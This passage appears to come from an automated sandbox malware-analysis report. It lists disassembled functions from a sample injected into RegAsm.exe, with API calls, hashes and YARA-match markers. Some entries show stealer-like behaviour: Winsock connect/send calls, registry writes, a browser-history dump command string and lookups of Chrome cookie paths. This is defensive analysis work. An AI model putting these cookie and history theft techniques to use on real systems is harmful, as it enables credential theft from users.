                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                  • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                  • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                  • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                  • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                  Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                  • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$lstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 493641738-0
                                                                                                                                  • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                  • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                  • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                  • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                  Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 00450A54
                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                  • _free.LIBCMT ref: 00450A66
                                                                                                                                  • _free.LIBCMT ref: 00450A78
                                                                                                                                  • _free.LIBCMT ref: 00450A8A
                                                                                                                                  • _free.LIBCMT ref: 00450A9C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                  • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                                                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                  • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                                                                  Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 100091D0
                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                  • _free.LIBCMT ref: 100091E2
                                                                                                                                  • _free.LIBCMT ref: 100091F4
                                                                                                                                  • _free.LIBCMT ref: 10009206
                                                                                                                                  • _free.LIBCMT ref: 10009218
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                  • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                  • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                  • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                  Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 00444106
                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                  • _free.LIBCMT ref: 00444118
                                                                                                                                  • _free.LIBCMT ref: 0044412B
                                                                                                                                  • _free.LIBCMT ref: 0044413C
                                                                                                                                  • _free.LIBCMT ref: 0044414D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                  • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                                                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                  • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                                                                  Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 1000536F
                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                  • _free.LIBCMT ref: 10005381
                                                                                                                                  • _free.LIBCMT ref: 10005394
                                                                                                                                  • _free.LIBCMT ref: 100053A5
                                                                                                                                  • _free.LIBCMT ref: 100053B6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                  • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                  • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                  • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                  Function 10009B0D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: fYM/
                                                                                                                                  • API String ID: 0-2459865102
                                                                                                                                  • Opcode ID: a6e3e212e3e8e69e5b3e90cc56111543990103d41b7ff965f9c36c1ca3af5bcd
                                                                                                                                  • Instruction ID: e0f187942aa90d3f3c40e731aaf8e1dc3f9218b11d74515a16622edea155382f
                                                                                                                                  • Opcode Fuzzy Hash: a6e3e212e3e8e69e5b3e90cc56111543990103d41b7ff965f9c36c1ca3af5bcd
                                                                                                                                  • Instruction Fuzzy Hash: C8519F75D0020AABFB11CFA4CD45FAE7BF9EF493A0F11405AF805A7299D731AA41CB61
                                                                                                                                  Function 0044E769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                                                                  • _free.LIBCMT ref: 0044E8D5
                                                                                                                                    • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                                                                                                    • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                                                                    • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                  • String ID: *?$.
                                                                                                                                  • API String ID: 2812119850-3972193922
                                                                                                                                  • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                  • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                                                                                  • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                  • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                                                                                  Function 100063F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 168COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 1000655C
                                                                                                                                    • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                                    • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                    • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                  • String ID: *?$.$fYM/
                                                                                                                                  • API String ID: 2667617558-1275761515
                                                                                                                                  • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                  • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                  • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                  • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                  Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                                                                    • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,02084830,00000010), ref: 004048E0
                                                                                                                                    • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                                                  • String ID: 8)3$XQG$NG
                                                                                                                                  • API String ID: 1634807452-3379486406
                                                                                                                                  • Opcode ID: fb13a16f46cddbed72709e993f3cbffc98f6c9ec46674720dbf4ce9be84bef95
                                                                                                                                  • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                                                                                  • Opcode Fuzzy Hash: fb13a16f46cddbed72709e993f3cbffc98f6c9ec46674720dbf4ce9be84bef95
                                                                                                                                  • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                                                                                  Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                                                                                  • _free.LIBCMT ref: 004435E0
                                                                                                                                  • _free.LIBCMT ref: 004435EA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                  • API String ID: 2506810119-1068371695
                                                                                                                                  • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                  • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                                                  • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                  • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                                                  Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                                                                  • _free.LIBCMT ref: 10004CE8
                                                                                                                                  • _free.LIBCMT ref: 10004CF2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                  • API String ID: 2506810119-1068371695
                                                                                                                                  • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                  • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                  • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                  • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                  Function 100098F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,10009C54,?,00000000,?), ref: 100099A8
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100099D6
                                                                                                                                  • GetLastError.KERNEL32(?,10009C54,?,00000000,?,00000000,00000000,?,00000000), ref: 10009A07
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                  • String ID: fYM/
                                                                                                                                  • API String ID: 2456169464-2459865102
                                                                                                                                  • Opcode ID: 427868bedf5aeb2dbe74816aae85c58cffe3606ac2297d0d696d101185ff0d15
                                                                                                                                  • Instruction ID: 4dca0cb6e5ae08cfaecef52c11f05f5c50a0db4386d341a895ff8b0f45518e07
                                                                                                                                  • Opcode Fuzzy Hash: 427868bedf5aeb2dbe74816aae85c58cffe3606ac2297d0d696d101185ff0d15
                                                                                                                                  • Instruction Fuzzy Hash: 7D314375A002199FEB14CF69CC95AEAB7B9EF48344F0144ADE50AD7254D730AD81CB61
                                                                                                                                  Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63841986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                  • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                  • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                                                  • API String ID: 368326130-3219657780
                                                                                                                                  • Opcode ID: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                                                                                                                  • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                                                                  • Opcode Fuzzy Hash: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                                                                                                                  • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                                                                                  Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _wcslen.LIBCMT ref: 00416330
                                                                                                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                                                                    • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen$CloseCreateValue
                                                                                                                                  • String ID: !D@$8)3$okmode
                                                                                                                                  • API String ID: 3411444782-1053461680
                                                                                                                                  • Opcode ID: 57136a84a30947c0709b98017b780919d60aa890551a81d584de28234602005d
                                                                                                                                  • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                                                                                  • Opcode Fuzzy Hash: 57136a84a30947c0709b98017b780919d60aa890551a81d584de28234602005d
                                                                                                                                  • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                                                                                  Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                                                                                                  Strings
                                                                                                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                                                                  • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                  • API String ID: 1174141254-1980882731
                                                                                                                                  • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                                                  • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                                                                  • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                                                  • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                                                                  Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                                                                                                  Strings
                                                                                                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                                                                  • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
